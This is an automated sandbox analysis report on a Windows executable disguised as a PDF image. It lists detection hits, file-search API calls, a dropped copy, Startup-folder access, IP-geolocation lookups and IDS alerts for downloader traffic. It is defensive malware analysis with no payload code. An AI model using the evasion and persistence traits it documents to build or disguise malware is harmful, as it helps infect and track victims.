Source: IMG-20241119-WA0006(162KB).Pdf.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: IMG-20241119-WA0006(162KB).Pdf.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49731 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49741 version: TLS 1.0

Source:	Binary string: wntdll.pdbUGP source: silvexes.exe, 00000001.00000003.1695952720.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, silvexes.exe, 00000001.00000003.1697558560.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, silvexes.exe, 00000004.00000003.1821250364.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, silvexes.exe, 00000004.00000003.1821528882.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: silvexes.exe, 00000001.00000003.1695952720.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, silvexes.exe, 00000001.00000003.1697558560.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, silvexes.exe, 00000004.00000003.1821250364.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, silvexes.exe, 00000004.00000003.1821528882.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_000C6CA9
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_000C60DD
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_000C63F9
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_000CEB60
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000CF56F FindFirstFileW,FindClose,	0_2_000CF56F
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_000CF5FA
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_000D1B2F
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_000D1C8A
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_000D1F94
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BF6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00BF6CA9
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BF60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	1_2_00BF60DD
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BF63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	1_2_00BF63F9
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BFEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_00BFEB60
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BFF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	1_2_00BFF5FA
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BFF56F FindFirstFileW,FindClose,	1_2_00BFF56F
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00C01B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_00C01B2F
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00C01C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_00C01C8A
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00C01F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_00C01F94

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0529F1F6h	2_2_0529F018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0529FB80h	2_2_0529F018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_0529E528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_0529ED3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_0529EB5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06831A38h	2_2_06831620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06830751h	2_2_068304A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 068302F1h	2_2_06830040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06831471h	2_2_068311C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0683D1A1h	2_2_0683CEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0683F8B9h	2_2_0683F610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06831A38h	2_2_06831610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0683C8F1h	2_2_0683C648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0683DA51h	2_2_0683D7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0683E759h	2_2_0683E4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0683B791h	2_2_0683B4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0683DEA9h	2_2_0683DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0683C041h	2_2_0683BD98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06831011h	2_2_06830D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0683F009h	2_2_0683ED60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0683CD49h	2_2_0683CAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0683FD11h	2_2_0683FA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0683D5F9h	2_2_0683D350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0683E301h	2_2_0683E058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0683F461h	2_2_0683F1B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0683C499h	2_2_0683C1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06830BB1h	2_2_06830900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0683EBB1h	2_2_0683E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0683BBE9h	2_2_0683B940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06831A38h	2_2_06831966
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06868945h	2_2_06868608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06866171h	2_2_06865EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 068658C1h	2_2_06865618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06865D19h	2_2_06865A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_068633A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_068633B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06866E79h	2_2_06866BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 068665C9h	2_2_06866320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06866A21h	2_2_06866778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06860741h	2_2_06860498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06867751h	2_2_068674A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06860B99h	2_2_068608F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 068602E9h	2_2_06860040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 068672FAh	2_2_06867050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06865441h	2_2_06865198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06868459h	2_2_068681B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06867BA9h	2_2_06867900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06860FF1h	2_2_06860D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06868001h	2_2_06867D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0119F1F6h	5_2_0119F007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0119FB80h	5_2_0119F007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_0119E528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_0119EB5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_0119ED3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05041A38h	5_2_05041620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05040BB1h	5_2_05040900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05041471h	5_2_050411C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050402F1h	5_2_05040040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05041011h	5_2_05040D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0504F009h	5_2_0504ED60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0504C041h	5_2_0504BD98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0504DEA9h	5_2_0504DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05040751h	5_2_050404A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0504E759h	5_2_0504E4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0504B791h	5_2_0504B4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0504DA51h	5_2_0504D7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0504F8B9h	5_2_0504F610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05041A38h	5_2_05041610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0504C8F1h	5_2_0504C648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0504D1A1h	5_2_0504CEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0504EBB1h	5_2_0504E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0504BBE9h	5_2_0504B940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05041A38h	5_2_05041966
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0504F461h	5_2_0504F1B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0504C499h	5_2_0504C1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0504E301h	5_2_0504E058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0504D5F9h	5_2_0504D350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0504FD11h	5_2_0504FA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0504CD49h	5_2_0504CAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06408945h	5_2_06408608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06405D19h	5_2_06405A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 064058C1h	5_2_06405618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06406171h	5_2_06405EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06406A21h	5_2_06406778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 064065C9h	5_2_06406320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06406E79h	5_2_06406BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	5_2_064033A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	5_2_064033B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 064002E9h	5_2_06400040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 064072FAh	5_2_06407050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06400B99h	5_2_064008F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06400741h	5_2_06400498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06407751h	5_2_064074A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06400FF1h	5_2_06400D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06408001h	5_2_06407D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06407BA9h	5_2_06407900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06405441h	5_2_06405198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06408459h	5_2_064081B0

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 4.2.silvexes.exe.19a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.silvexes.exe.1e60000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168
Source: Joe Sandbox View	IP Address: 172.67.177.134 172.67.177.134

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49735 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49754 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49748 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49751 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 172.67.177.134:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49731 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49741 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

